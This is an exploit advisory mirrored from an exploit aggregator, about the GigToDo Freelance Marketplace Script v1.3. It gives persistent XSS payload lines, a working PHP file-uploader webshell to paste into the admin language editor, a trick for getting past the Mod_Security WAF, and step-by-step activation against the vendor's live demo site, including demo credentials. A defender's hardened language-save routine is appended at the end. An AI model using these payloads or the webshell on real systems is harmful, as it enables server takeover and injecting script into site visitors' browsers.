GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload

CVE: -    Category: CWE-79    Price: $500    Severity: Critical
Author: Unknown    Risk: High    Exploitation Type: Remote    Date: 2019-07-26
CVSS: Not available    EPSS: 0.02192    EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070115

Below is a copy:

GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload
/*!
* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload
* # Google Dork: -
* # Date: 2019/07/22
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79, CWE-434
*/

::- Details & Description -::
~ The GigToDo - Freelance Marketplace Script web application is vulnerable to persistent XSS injection and WebShell upload, which allow an attacker to inject JavaScript or HTML code into the front-end or to take full control of the project/server.

::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Backend: https://www.gigtodo.com/admin/login.php
~ Login / Password: [email protected] / Pat

::- Special Note -::
~ The web application costs $175 and has 8 sales.
~ On the demo website you'll face the Mod_Security WAF, which can be bypassed; just read the Important Stuff note at the end of this document. There is no guarantee that customers use any kind of WAF, so the entire exploitation process may be much easier.
~ file_put_contents() isn't disabled, so this may well be another attack vector. The files https://www.gigtodo.com/m0ze.txt and https://www.gigtodo.com/m0ze.php were created by using this method.
~ The Mod_Security WAF can be triggered by the <input> tag. To bypass it, simply break up the word, e.g. <in put>. On the front-end, use the Developer Console to merge this HTML tag back into <input>.

::- PoC Links -::
~ https://www.gigtodo.com/m0ze.txt
~ https://www.gigtodo.com/m0ze.php
~ https://www.gigtodo.com/vh.php

::- PoC [Basic Stuff] -::
~ First of all we need to create a new language for the front-end at https://www.gigtodo.com/admin/index?insert_language -> for the Language Title input field use something unique and simple (like your handle/nickname, but without special chars and symbols), for the Language Image choose any image you want, then press the Insert Language button. After a successful submit there will be a .php file with your name inside the https://www.gigtodo.com/languages/ directory (I've used m0ze as a language name, so my file is https://www.gigtodo.com/languages/m0ze.php). On the https://www.gigtodo.com/admin/index?view_languages page you'll see your language for the front-end, so press the Settings button and you'll see a text editor. That's what we need.

::- PoC [Persistent XSS Injection] -::
~ For persistent XSS injection you need to add your payload inside any translation value (check the examples below) and then press the Update Language Settings button. The final step is to activate your updated file (read the Important Stuff below).
~ Example #1: $lang["find_us_on"] = "FIND US ON<img src=https://www.gigtodo.com/images/t5ehiaquEEQ.jpg onload=alert('m0ze')>";
~ Example #2: $lang["sign_in"] = "Sign In</a><img src=x><a>";

::- PoC [WebShell Upload] -::
~ Delete all existing data from your language file (CTRL + A -> Del) and use this code to create a simple file uploader:
GIF89;a
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<style>*{font-family:'Courier New',sans-serif;font-size:14px;color:#ff003b;background-color:black;}</style>
</head>
<body>
<?php echo "<center>File Uploader :: m0ze<br>";echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file2upload'><input type='submit' name='upload' value='Upload'></form></center>";$files = $_FILES['file2upload']['name'];if(isset($_POST['upload'])){if(@copy($_FILES['file2upload']['tmp_name'], $files)){echo "<center>[+] File <b>$files</b> has been uploaded [+]</center>";}else{echo "<center>[-] Upload has failed [-]</center>";}} ?>
</body>
</html>
Make sure that you copy all the code above from GIF89;a to </html>, otherwise you'll face the Mod_Security alert. Press the Update Language Settings button and you should see the success alert message. The final step is to activate your updated file (read the Important Stuff below) and upload any file you want.

::- PoC [Important Stuff] -::
~ Keep in mind that code inside your language file WILL NOT WORK UNTIL YOU ACTIVATE IT. For activation go to the front-end https://www.gigtodo.com and scroll the page down; on the right side you'll see the FIND US ON text and a language select option at the bottom. Select your language from the list and wait until the page reloads. That's it, now your code is up and running.
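The root cause of both issues above is that the admin editor writes raw text into languages/<name>.php, which is then included as PHP and echoed unescaped. The following is an added example of a hardened save step written from a defender's perspective; it is not GigToDo's code, and the function names, the LANG_DIR constant and the translation-key format are assumptions.

```php
<?php
// Added example, not code from GigToDo or from the advisory author.
// Function and constant names are assumptions. It replaces the "Update
// Language Settings" save step with one that rebuilds languages/<name>.php
// from validated key/value pairs, so the stored file can only ever contain
// string-literal assignments to $lang, and escapes those values on output.
declare(strict_types=1);

const LANG_DIR = __DIR__ . '/languages';   // assumed location of the language files

// Only short lowercase language codes: no path separators, dots or extensions,
// so the name chosen in the "Language Title" field cannot steer the write path.
function validate_language_name(string $name): string
{
    if (!preg_match('/^[a-z]{2,8}$/', $name)) {
        throw new InvalidArgumentException('invalid language name');
    }
    return $name;
}

// Rebuild the language file from data. var_export() emits each value as a
// single-quoted PHP string literal with quotes and backslashes escaped, so a
// value containing "<?php", HTML or a closing quote stays inside its literal
// and is never parsed as code when the file is included.
function save_language_file(string $name, array $translations): string
{
    $name  = validate_language_name($name);
    $lines = ['<?php', 'declare(strict_types=1);', '$lang = [];'];
    foreach ($translations as $key => $value) {
        if (!is_string($key) || !preg_match('/^[a-z0-9_]{1,64}$/', $key) || !is_string($value)) {
            throw new InvalidArgumentException('invalid translation entry');
        }
        $lines[] = sprintf('$lang[%s] = %s;', var_export($key, true), var_export($value, true));
    }
    $path = LANG_DIR . '/' . $name . '.php';
    $tmp  = $path . '.tmp';
    if (file_put_contents($tmp, implode("\n", $lines) . "\n", LOCK_EX) === false) {
        throw new RuntimeException('could not write language file');
    }
    rename($tmp, $path);   // atomic replace, never a half-written file
    return $path;
}

// Output helper: translation values are data, so they are HTML-escaped at
// render time. A stored value like Example #1 above is shown as text, not
// executed as markup.
function t(array $lang, string $key): string
{
    return htmlspecialchars($lang[$key] ?? $key, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

The residual risk is that languages/<name>.php is still a PHP file that gets included; storing translations as JSON and decoding them at runtime removes the file-as-code path entirely, and the languages/ directory should not be writable by the web server user in production.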

Copyright ©2024 Exploitalert.
